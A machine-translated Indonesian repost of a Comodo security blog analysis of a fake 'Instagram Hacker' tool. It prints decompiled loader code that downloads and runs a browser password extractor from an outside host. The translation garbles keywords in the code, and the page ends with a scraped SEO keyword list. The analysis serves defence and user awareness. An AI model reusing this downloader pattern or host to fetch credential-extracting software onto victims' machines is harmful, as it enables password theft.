Waktu Membaca: 4 menit
Banyak orang tidak menganggap Aplikasi yang Mungkin Tidak Diinginkan (PUA) sebagai bahaya serius. Alasan untuk sikap sembrono adalah bahwa PUA biasanya dipasang dengan persetujuan pengguna. Namun pendapat ini merupakan kesalahan besar. Dan bukan hanya karena PUA dapat secara diam-diam menginstal program lain seperti adware atau spyware berbasis drive-by download. Contoh nyata di bawah dianalisis oleh Comodo Threat Research Labs para ahli dengan jelas menunjukkan bahwa PUA bisa menjadi senjata yang jauh lebih mengancam.
Temui perangkat lunak bernama "Peretas Instagram". Ini memiliki situs web resmi https://hackinstagram.net/ dan berjanji ... untuk meretas akun Instagram apa pun. Lebih dari itu, Anda dapat mengunduh dan menginstalnya secara gratis.
Setelah instalasi, diminta untuk memasukkan URL profil Instagram dan meretas kata sandi.
Hasilnya muncul dalam beberapa detik:
Tetapi setelah mengklik tombol "Lihat Kata Sandi", sebuah jendela baru muncul:
Mengklik tombol "Dapatkan Kode Aktivasi" akan diarahkan ke "Beli halaman".
Ia menawarkan untuk membeli "Kode Aktivasi" tetapi ... bisakah Anda mencium aroma penipuan di udara? Jelas, tidak ada perangkat lunak yang dapat memecahkan kata sandi Instagram selama beberapa detik. Jadi, apakah Instagram Hacker hanyalah alat menipu untuk menipu para simpleton? Cara terbaik untuk memeriksanya adalah dengan melihat ke dalam kode aplikasi.
Kode dilindungi dengan Dotnet Reactor tetapi dapat diterjemahkan dengan alat de4dot.
Dan sekarang kita bisa melihat pasti aplikasi tersebut merupakan alat penipuan. Fragmen kode pertama hanya memalsukan indikator demonstrasi kemajuan.
Tapi satu lagi lebih menarik. Seperti yang Anda lihat, ini berisi URL yang dapat dieksekusi untuk diunduh jika aktivasi berhasil.
Memuat Jendela
{
Class2.qDiUy7EzyuIMj ();
this.filename = "view.exe";
this.uri = Uri baru ("http://software-logistics.net/external/component/download/view.exe");
this.InitializeComponent ();
if (File.Exists (this.filename))
{
File.Delete (this.filename);
}
mencoba
{
WebClient client1 = WebClient baru ();
client1.DownloadFileAsync (this.uri, this.filename);
client1.DownloadProgressChanged + = new DownloadProgressChangedEventHandler (this.method_1);
client1.DownloadFileCompleted + = AsyncCompletedEventHandler baru (this.method_2);
}
menangkap
{
this.method_0 ();
}
}
}
}
Jika kita menjalankan executable, kita akan mengetahui bahwa itu adalah aplikasi WebBrowserPassView dari NirSoft:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView hanyalah alat ekstraksi kata sandi yang mengungkapkan kata sandi yang disimpan oleh browser web. Jadi semua kata sandi yang dapat diekstrak oleh perangkat lunak ini bukan milik Instagram tetapi kata sandi milik pengguna yang disimpan di peramban mereka!
Mari kita lanjutkan: yang dilakukan Instagram Hacker hanyalah mengunduh dan meluncurkan PUA lain dari NirSoft. Jadi kami jelas menghadapi alat penipuan. Perhatikan trik psikologis manipulatif di sini: jika seorang korban menemukan dia ditipu, dia hampir tidak melaporkan polisi tentang insiden itu. Karena dalam hal itu, dia harus mengaku mencoba meretas Instagram, itu adalah tindakan melakukan kejahatan dunia maya.
Tapi ujungnya tipis.
Ancaman paling berbahaya adalah bahwa URL dalam aplikasi dapat dengan mudah diubah pada yang lain dengan file jahat yang akan dieksekusi di mesin korban. Jadi PUA ini - dan juga banyak contoh lain dari jenis malware seperti itu - dapat digunakan untuk proliferasi masif berbagai malware "berat" seperti trojan, backdoors, ransomware dan sebagainya
Dan ini adalah alasan bagus untuk menganggap PUA sebagai malware yang sangat berbahaya. Karena itu bisa menjadi batu loncatan untuk serangan cyber besar yang menghancurkan.
โHari ini kita seharusnya tidak mempertimbangkan malware sebagai berbahaya atau tidak begitu berbahaya, โkata Fatih Orhan, Kepala Laboratorium Penelitian Ancaman Comodo. "Apa saja malware tidak ada di ruang yang terisolasi. Saat ini penjahat dunia maya membangun rantai malware panjang untuk menyerang pengguna, dan, seperti yang Anda lihat, PUA dapat menjadi tautan dalam rantai pembunuhan semacam itu. Jadi kita harus memanggil sekop sekop. Ya, aplikasi ini diunduh dan dijalankan dengan persetujuan pengguna tetapi, seperti dalam kasus ini, persetujuan diperas oleh penipuan. Sepanjang aplikasi yang mungkin tidak diinginkan berpura-pura sah, semua orang perlu memahami bahwa itu hanya kamuflase. Itulah sebabnya Comodo tidak hanya memberikan perlindungan teknis kelas atas tetapi secara teratur memberi tahu pengguna untuk mencegah mereka dari jebakan berbahaya di dunia maya โ.
Hidup aman dengan Comodo!
Sumber Terkait
Serangan DDOS Wikipedia
Penghapusan Malware
Pemindai Malware Situs Web
Keamanan Situs Web Terbaik
Keamanan WordPress
MULAI PERCOBAAN GRATIS DAPATKAN SCORECARD KEAMANAN INSTAN ANDA GRATIS
- Konten Bertenaga SEO & Distribusi PR. Dapatkan Amplifikasi Hari Ini.
- Platoblockchain. Intelijen Metaverse Web3. Pengetahuan Diperkuat. Akses Di Sini.
- Sumber: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- Sanggup
- Tentang Kami
- Akun
- Bertindak
- Activation
- Setelah
- UDARA
- Semua
- dan
- Lain
- Aplikasi
- aplikasi
- persetujuan
- menyerang
- sikap
- backdoors
- dasar
- karena
- TERBAIK
- Besar
- Blog
- Istirahat
- browser
- membangun
- tombol
- membeli
- panggilan
- kasus
- rantai
- rantai
- memeriksa
- Jelas
- kode
- melakukan
- persetujuan
- Mempertimbangkan
- mengandung
- Serangan cyber
- cybercrime
- penjahat cyber
- BAHAYA
- Berbahaya
- DDoS
- yang menghancurkan
- Temukan
- Dont
- dua kali lipat
- Download
- mudah
- Tepi
- Enter
- dll
- Acara
- contoh
- contoh
- ahli
- ekstrak
- Menghadapi
- beberapa
- File
- Menemukan
- Pertama
- penipuan
- Gratis
- dari
- mendapatkan
- baik
- lebih besar
- terjangan
- hacker
- kepala
- di sini
- Seterpercayaapakah Olymp Trade? Kesimpulan
- How To
- HTML
- HTTPS
- in
- insiden
- Indikator
- install
- saat
- menarik
- terpencil
- IT
- Labs
- peluncuran
- LINK
- Panjang
- melihat
- mesin
- malware
- Serangan malware
- banyak
- besar-besaran
- max-width
- kesalahan
- lebih
- paling
- Bernama
- kebutuhan
- New
- Jelas
- Penawaran
- resmi
- Situs Resmi
- ONE
- Pendapat
- Lainnya
- sendiri
- Kata Sandi
- password
- Konsultan Ahli
- PHP
- plato
- Kecerdasan Data Plato
- Data Plato
- Polisi
- berpotensi
- mencegah
- Profil
- program
- Kemajuan
- menjanjikan
- terlindung
- perlindungan
- memberikan
- menyadari
- alasan
- sembrono
- secara teratur
- laporan
- penelitian
- mengakibatkan
- lanjut
- Mengungkapkan
- Membersihkan
- Run
- kartu skor
- detik
- aman
- keamanan
- serius
- harus
- So
- Perangkat lunak
- Space
- spyware
- tersimpan
- sukses
- seperti itu
- Mengambil
- Teknis
- Grafik
- mereka
- ancaman
- di seluruh
- waktu
- untuk
- alat
- perangkap
- MENGHIDUPKAN
- memahami
- tidak diinginkan
- URL
- Pengguna
- Pengguna
- biasanya
- berbagai
- Korban
- View
- jaringan
- Browser web
- Situs Web
- akan
- akan
- Kamu
- Anda
- zephyrnet.dll